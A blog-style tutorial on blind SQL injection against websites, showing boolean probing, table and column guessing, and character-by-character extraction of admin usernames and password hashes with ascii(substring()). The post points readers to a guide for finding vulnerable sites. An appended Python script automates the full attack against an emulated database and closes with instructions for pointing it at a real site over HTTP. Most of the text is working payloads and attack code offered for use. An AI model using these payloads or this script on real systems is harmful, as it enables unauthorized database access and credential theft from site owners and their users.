Wednesday 21 May 2014

BLIND SQL INJECTION USING ASCII CHARACTERS


Blind SQL injection (ASCII characters)


For educational purposes only!

A website vulnerable only to blind SQL injection.
Notepad, to store the data you collect while injecting.
And loads and loads of spare time.

Finding vulnerable sites: --Kobez expanding vulnerable collection guide!--


Checking vulnerability

Let's start. How do we know if a site is only vulnerable to blind injection?

Well, you have a site, same as with a normal injection: index.php?id=, page.php?f= or whatever, it does not matter.
We want to check whether it is vulnerable, so we put and 1=1 behind the id number.
That is always true, so in this case we do not get an error and the page looks exactly as before.
Now the real test: instead of 1=1, use and 1=2.



Code:
www.[site].com/index.php?id=1+and+1=2

If we see text missing or images moving around,
or an error like: invalid id, or db_error select * from [site]@localhost ... blah blah blah,
this means it is vulnerable.
(If the page prints the database error itself, you are probably not limited to blind injection at all; blind is for the case where the only thing you get back is a changed page.)

Do not forget: and 1=1 means true, the page returns unharmed.
and 1=2 is false, the page returns an error or moved content.
Compare both against the page with nothing added, so you do not mistake a random change in the page for the injection working.


Finding the MySQL version of the site.

Since it is blind SQLi, the site will not pop up the version when you put version() in the query. It needs more.
Using substring(@@version,1,1)=4 asks whether the first character of the version is 4. So we ask the database: hey database, is this a version 4 you use?
Database is like: no, wtf, I'm awesome (it returns false).
That means instead of =4 we put =5.


Code:
www.[site].com/index.php?id=1 and substring(@@version,1,1)=5

Database returns true (page is normal).
This means it is a version 5 database. (That is only the first digit, so 5.0 and 5.7 both answer yes here; take more characters of @@version if you need the exact version.)

Guessing columns and tables.
Yeeey people, we moved on to the fun stuff: guessing tables and columns.
Since the database only says true or false, we are going to ask our little friend the database about everything.

Blind SQLi is not that hard, but it sucks as hell!!

How do we guess?
We put something like this: and (select 1 from users limit 0,1)=1
What did I do? Well,
I ask the database: hey, do you by any chance have a table called USERS? Database: no, I'm awesome, guess again.
A table that does not exist makes the whole query fail, so the database returned false and we try again.
Code:
www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1

Now I asked the database if it has an admin table. Database answers: yes, I'm awesome, and returns true.
That means we have a hit, yay.
(Watch out: if the table exists but is empty, the subquery returns no row and you also get false, so a miss is not proof that the table is not there.)
If you are unlucky you need to guess more.

Examples: members, tbl_admin, tbladmin, administrator, tbl_users, tblusers, admn
and way more.

God bless us, because our journey is not yet at its end.

Columns. We need to guess them too :D

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from admin limit 0,1)=1

What did I do?
Well, I asked the database: hey, do you have a column password in table admin?
The concat(1,password) trick puts a 1 in front of whatever is in the column, so the first character is always 1 if the column exists; if the column does not exist, the query fails and we get false. (If the column exists but holds NULL, concat returns NULL and you also get false.)
Database: yes, I have one.
It returned true.
We still need usernames, or whatever they called it.

Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1

I ask the database if it has a column username. Database is like: NO, wtf!
It returned false. Now I'm thinking of killing myself.

Let's try again..
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,name),1,1) from admin limit 0,1)=1

I asked the database if it has name as a column in table admin.
Database: yes. It returned true.

Hold on Hold on we are not finished yet.

Get password and username using ASCII characters!

Since the database hates us, it won't just pop up the hash and username like that.
Let's suck it out of it; it made us mad already.

By using the ascii() function we can do this.
We know we have the column password and the column name. Let's use this.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>99
It returned true, so we need to go higher.
But first, what did I do?
I used ascii() at the start: it turns the selected character into its ASCII code, so we can compare it with a number.
Then I select name, 0x3a (a colon, written in hex so we need no quotes) and password, as shown in my basic tutorial; you should know this by now.
And I selected these out of the table admin, the row with userid=2. (userid is a guess too; if you have not confirmed such a column, use limit 1,1 to pick the second row instead.)
Ok, that should be clear.

We still need to go higher with the ASCII code.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>101


It returned true again.
We need to go higher!
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>102


Error.
This means it is higher than 101 but not higher than 102, so we know it is 102, yay.
The first character is 102. Let's check this in an ASCII converter,
or use Google and type "ascii character 102".
I got the letter f as my first character.
Instead of stepping up one by one you can halve the range each time (start at >63, then >95 or >31, and so on): all printable characters have codes below 128, so about seven requests per character are enough.
Finding the next character.

Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),2,1))>99

Look at the changes at the end of the link!!
I changed the 1,1 into 2,1.
When substring() runs past the end of the string it returns an empty string, and ascii() of that is 0, so once every > test comes back false you have reached the end of the value.
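The whole procedure above, from the 1=1 / 1=2 check through table and column guessing to the character-by-character extraction, as one added example in Python. This is not code from the original post and it has no real target: a small in-memory SQLite database stands in for the site (the tables news and admin, the userid/name/password rows and the hashes in them are all constructed sample data), the vulnerable query pastes the id parameter straight into the SQL, and the "page" either comes back with content (true) or broken (false). The MySQL functions ascii(), substring() and concat() are registered as SQLite user functions so the post's payloads can be sent unchanged; @@version has no SQLite equivalent, so the version step is left out. The extraction uses the same > comparisons as the post, but as a binary search over the ASCII code instead of stepping up one value at a time.

```python
import sqlite3


def build_target():
    """Constructed stand-in for the vulnerable site's database (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    # MySQL functions the payloads rely on; SQLite lacks them or names them
    # differently, so they are emulated here, including MySQL's NULL behaviour.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function(
        "substring", 3,
        lambda s, pos, n: None if s is None else str(s)[pos - 1:pos - 1 + n])
    conn.create_function(
        "concat", -1,
        lambda *a: None if any(x is None for x in a) else "".join(str(x) for x in a))
    conn.execute("CREATE TABLE news (id INTEGER, body TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Welcome to the site')")
    conn.execute("CREATE TABLE admin (userid INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?, ?)", [
        (1, "root", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "frank", "e10adc3949ba59abbe56e057f20f883e"),
    ])
    return conn


class Target:
    """The vulnerable page. The id parameter is pasted into the query unescaped,
    which is the bug the whole post exploits."""

    def __init__(self):
        self.conn = build_target()
        self.requests = 0

    def page_ok(self, id_param):
        """True when the page renders normally, False on missing content or a DB error."""
        self.requests += 1
        sql = "SELECT body FROM news WHERE id=" + id_param
        try:
            row = self.conn.execute(sql).fetchone()
        except sqlite3.Error:
            return False
        return row is not None


def oracle(target, condition):
    """One blind probe: append 'and <condition>' to a valid id and read the answer."""
    return target.page_ok("1 and " + condition)


def extract_string(target, inner_select, max_len=80):
    """Recover inner_select's result one character at a time.

    Each character's ASCII code is found by binary search with the same '>'
    comparison the post uses: 7 requests per character for codes 0..127
    instead of stepping up one value at a time. MySQL's substring() past the
    end gives '' and ascii('') is 0, which is the stop condition."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127          # invariant: the code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"ascii(substring(({inner_select}),{pos},1))>{mid}"
            if oracle(target, probe):
                lo = mid + 1     # true page: code > mid
            else:
                hi = mid         # false page: code <= mid
        if lo == 0:
            break                # past the end of the string
        result += chr(lo)
    return result


def run_attack():
    """Walks the post's steps against the emulated site and returns the findings."""
    target = Target()
    findings = {}
    # Step 1: a true condition keeps the page, a false one breaks it.
    findings["injectable"] = oracle(target, "1=1") and not oracle(target, "1=2")
    # Step 2: guess table names; an unknown table makes the query fail.
    findings["tables"] = {
        t: oracle(target, f"(select 1 from {t} limit 0,1)=1")
        for t in ("users", "admin")}
    # Step 3: guess columns. The post compares with the bare number 1, which
    # works because MySQL coerces '1' to 1; SQLite needs the quoted '1'.
    findings["columns"] = {
        c: oracle(target, f"(select substring(concat(1,{c}),1,1) from admin limit 0,1)='1'")
        for c in ("password", "username", "name")}
    # Step 4: pull name:password for userid 2. char(58) is ':' in MySQL and
    # SQLite alike; the post writes it as the hex literal 0x3a.
    findings["secret"] = extract_string(
        target, "select concat(name,char(58),password) from admin where userid=2")
    findings["requests"] = target.requests
    return findings


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(f"{key}: {value}")
```

Against a real site the only thing that changes is page_ok(): replace the local query with an HTTP request and decide true/false by whether the marker text (the content that vanishes on 1=2) is in the response. Counting requests is worth keeping, since 7 per character is what makes this practical at all.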
